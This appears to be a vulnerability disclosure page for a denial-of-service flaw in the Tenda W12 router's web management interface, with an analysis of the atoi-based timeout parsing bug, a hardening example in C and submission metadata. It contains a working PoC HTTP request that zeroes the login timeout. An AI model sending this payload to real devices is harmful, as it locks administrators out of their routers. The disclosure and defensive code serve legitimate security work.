| Title | Tenda W12 V3.0.0.7(4763) Denial of Service |
|---|---|

**Description**

# Denial-of-Service Vulnerability in the `cgiSysWebTimeoutSet` Function of Tenda W12
## Basic Information
- Vendor: Tenda
- Product: W12
- Firmware Version: V3.0.0.7(4763)
- Firmware Release Date: 2026-03-04
## Vulnerability Overview
A denial-of-service vulnerability exists in the `cgiSysWebTimeoutSet` function of the `/bin/httpd` binary in Tenda W12 V3.0.0.7(4763). An attacker can remotely send a specially crafted request that makes the web management interface unusable.
## Detailed Analysis
### `cgiSysWebTimeoutSet` Pollutes the `web_over_time` Variable
The user-controlled `timeoutTime` value is processed by `atoi` and then written into the `web_over_time` variable. When the supplied data is invalid, this variable may be set to `0` or a negative value.
This variable is later referenced in the `authSecurityHandler` function, where time validation is performed whenever the administrator logs in.
If the value becomes `0`, every login attempt triggers the timeout mechanism, causing the user to be continuously redirected back to the login page and preventing access to the management backend.
PoC request:
```http
POST /goform/modules HTTP/1.1
Host: 192.168.0.1
Content-Type: application/json
Connection: close

{
"sysWebTimeoutSet": {
"timeoutTime": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
}
```
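As an added illustration (not code from the advisory, the submitter, or Tenda's firmware), the following C program models the parsing pattern the analysis describes: a lenient `atoi` parse of `timeoutTime` beside a strict, range-checked parser that a fix would use, plus a simplified version of the login-time timeout check to show why `web_over_time == 0` treats every session as expired. The function names, the range limits and the session-check logic are assumptions, not recovered from `/bin/httpd`.

```c
/* Added example, not Tenda's code: the advisory describes an atoi()-based
 * parse of the user-controlled "timeoutTime" value into web_over_time. This
 * file contrasts that lenient parse with a strict, range-checked parser a
 * defender would want, and shows why a zero timeout locks out every login.
 * All function and constant names here are hypothetical. */
#include <ctype.h>
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#define WEB_TIMEOUT_MIN 60      /* seconds; assumed policy floor */
#define WEB_TIMEOUT_MAX 86400   /* seconds; assumed policy ceiling */

/* Lenient parse as the advisory describes: atoi() returns 0 for non-numeric
 * input and silently accepts negative values. */
int web_timeout_lenient(const char *timeoutTime) {
    return atoi(timeoutTime);
}

/* Hardened parse: accept only a plain decimal integer made up of every
 * character in the input, and enforce a sane range. Returns 0 and sets *out
 * on success; -1 on rejection (the caller keeps the previous web_over_time). */
int web_timeout_strict(const char *timeoutTime, long *out) {
    if (timeoutTime == NULL || *timeoutTime == '\0')
        return -1;
    /* Only ASCII digits allowed: no sign, no whitespace, no trailing junk. */
    for (const char *p = timeoutTime; *p; p++)
        if (!isdigit((unsigned char)*p))
            return -1;
    if (strlen(timeoutTime) > 10)   /* cheap overflow guard before strtol */
        return -1;
    errno = 0;
    char *end = NULL;
    long v = strtol(timeoutTime, &end, 10);
    if (errno == ERANGE || end == timeoutTime || *end != '\0')
        return -1;
    if (v < WEB_TIMEOUT_MIN || v > WEB_TIMEOUT_MAX)
        return -1;
    *out = v;
    return 0;
}

/* Models the login-time check the advisory attributes to authSecurityHandler:
 * a session counts as timed out once web_over_time seconds have elapsed.
 * With web_over_time == 0 (or negative) this is true for every request,
 * which is the lockout the advisory describes. Returns 1 if timed out. */
int session_timed_out(time_t now, time_t last_activity, long web_over_time) {
    return (now - last_activity) >= web_over_time;
}

int main(void) {
    const char *polluted = "AAAAAAAAAAAAAAAA";  /* constructed, mirrors the PoC */
    long t = 0;
    printf("atoi(\"%s\") = %d\n", polluted, web_timeout_lenient(polluted));
    printf("strict parse of polluted input: %s\n",
           web_timeout_strict(polluted, &t) == 0 ? "accepted" : "rejected");
    printf("strict parse of \"300\": %s (t=%ld)\n",
           web_timeout_strict("300", &t) == 0 ? "accepted" : "rejected", t);
    time_t now = time(NULL);
    printf("timeout 0, fresh login: timed out = %d\n",
           session_timed_out(now, now, 0));
    printf("timeout 300, fresh login: timed out = %d\n",
           session_timed_out(now, now, 300));
    return 0;
}
```

The strict parser rejects the PoC payload, `0`, negative numbers and values with trailing characters, so a malformed `timeoutTime` leaves the stored timeout unchanged instead of zeroing it; the range floor is the part a vendor fix would need to tune to product policy.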
## Impact
- May cause a denial-of-service condition and make the service unavailable
| Source | ⚠️ http://cdn2.v50to.cc/cgiSysWebTimeoutSet_dos.zip |
|---|---|
| User | CookedMelon (UID 52513) |
| Submission | 2026-05-06 08:35 (29 days ago) |
| Moderation | 2026-05-30 18:47 (24 days later) |
| Status | Accepted |
| VulDB Entry | 367471 [Tenda W12 3.0.0.7(4763) Web Management Interface /bin/httpd cgiSysWebTimeoutSet web_over_time denial of service] |
| Points | 17 |